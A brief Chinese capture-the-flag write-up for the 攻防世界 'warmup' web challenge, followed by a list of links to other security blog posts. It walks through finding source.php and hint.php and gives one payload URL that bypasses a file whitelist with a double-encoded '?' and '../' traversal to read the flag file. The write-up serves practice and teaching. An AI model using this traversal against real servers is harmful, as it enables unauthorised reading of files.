攻防世界-warmup

原题解题思路

只有一张图片,就查看源代码,有一个source.php。

查看source.php,白名单中还有一个hint.php。

hint.php告诉我们flag的位置ffffllllaaaagggg

但是直接跳转是没用的,构造payload。

复制代码
http://61.147.171.105:55725/source.php?file=source.php%253f/../../../../../../ffffllllaaaagggg
相关推荐
上海云盾-高防顾问21 小时前
中小企业低成本渗透测试实操指南
网络协议·web安全·网络安全
WayneJoon.H1 天前
2023CISCN go_session
网络安全·golang·ctf·代码审计·ciscn
-曾牛1 天前
Yak语言核心基础:语句、变量与表达式详解
数据库·python·网络安全·golang·渗透测试·安全开发·yak
2503_946971861 天前
【CTI/IAM】2026年度威胁情报分析与身份隔离架构基准索引 (Benchmark Index)
网络安全·系统架构·数据集·身份管理·威胁情报
Bug.ink1 天前
BUUCTF——WEB(7)
web安全·网络安全·buuctf
heze091 天前
sqli-labs-Less-6自动化注入方法
mysql·网络安全·自动化
heze091 天前
sqli-labs-Less-8自动化注入方法
mysql·网络安全·自动化
安全渗透Hacker1 天前
参数未校验导致的DOS(服务拒绝)问题典型场景
java·安全·web安全·网络安全·安全性测试
小谢取证1 天前
电子数据取证之使用Trae进行流量包解析
网络安全
MOON404☾1 天前
003.端口扫描
网络·安全·web安全·网络安全·系统安全